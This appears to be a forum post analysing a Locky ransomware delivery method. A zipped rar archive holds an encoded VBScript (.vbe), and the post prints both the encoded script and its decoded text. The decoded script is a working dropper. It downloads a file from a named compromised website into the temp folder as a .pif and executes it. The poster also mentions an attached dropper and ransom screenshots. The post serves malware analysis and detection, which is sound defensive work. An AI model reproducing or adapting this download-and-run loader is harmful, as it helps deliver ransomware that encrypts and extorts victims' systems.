Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file).
The vbs file tries to download and run a locky dropper.
Several AV-Scanners suck to detect this.
Encrypted .vbe file
Code: Select all'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==@#@&L4Tq~|SkN,xPrtOYa)&&mxYb5E/O(r8VR1WhzA2 kUm^;N/&^DYrWbmCYdJ.{GLREJ@#@&URkAAA==^#~@
'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==@#@&tn_KGs9_.mdP{PEyX6^a.my$dNm/RarWJ,@#@&joL4-kl4N6VfG\~x,ZDnCD+64Nn1YcrUmDbwD ?4+sVr# 3Xwl [2 \kMGU:xD?ODrUT/cJuO+swYE*@#@&ioNt-/m490VGf7P',jw%t7/Ct90V9G\PL~J'J@#@&[r:,x |$1F^m/lPUnY,xUF~1|^CkPxP1.lOW(L+1YvEHbm.WkWWOc(HduK:nJ*@#@&Nb:,m^Mo9_?9m1d),?nO,mm!oGCjf1^kPx,mM+lD+K8LmO`rb[G94RUODl:rb@#@& xnAH|^CkR6wUPrM3Pr~P%4Tq$|dd9~~wl^/+@#@& U|~1Fmm/ jxN@#@&hbYt,^^Mwf_?9m^d@#@&~P,~RDX2n,'Pq~@#@&~P,~cW2x@#@&P,P, hMkO+,xUF~1|1C/cD+k2Gxk+~W[X@#@&,P~Pcdl7+OG6kVn~`s%t7dmt[63Gf\,[,~tCPfw9u#m/~,+P@#@&+ [~hbY4@#@&?nO,t[KIojkl[[1P'~/M+CY6(Ln1YvJ?4+^sRzw2VbmCObWxrbP@#@&t9Pes`/mN[m 6a+UP`oL4\dC4N0V9G\~[,4CPGsxC.m/@#@&E7sAAA==^#~@
Decrypted:
Code: Select alljhgIBKLsd = "http://antiques-bible.com/wp-includes/certificates/V7Dj8u"
heHTDFJHVas = "zxxcxzczqsdas.pif"
UFjhvsahdfkDDv = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
UFjhvsahdfkDDv = UFjhvsahdfkDDv & "\"
dim nnKBNKcas: Set nnKBNKcas = createobject("Microsoft.XMLHTTP")
dim ccGFDHSDccs: Set ccGFDHSDccs = createobject("Adodb.Stream")
nnKBNKcas.Open "GET", jhgIBKLsd, False
nnKBNKcas.Send
with ccGFDHSDccs
.type = 1
.open
.write nnKBNKcas.responseBody
.savetofile UFjhvsahdfkDDv & heHTDFJHVas, 2
end with
Set hdTYFUsaddc = CreateObject("Shell.Application")
hdTYFUsaddc.Open UFjhvsahdfkDDv & heHTDFJHVas
Dropper attached!
_HELP_instructions.gif (46.33 KiB) Viewed 1110 times
Payment:
paymentscreenshot.png (111.55 KiB) Viewed 1110 times
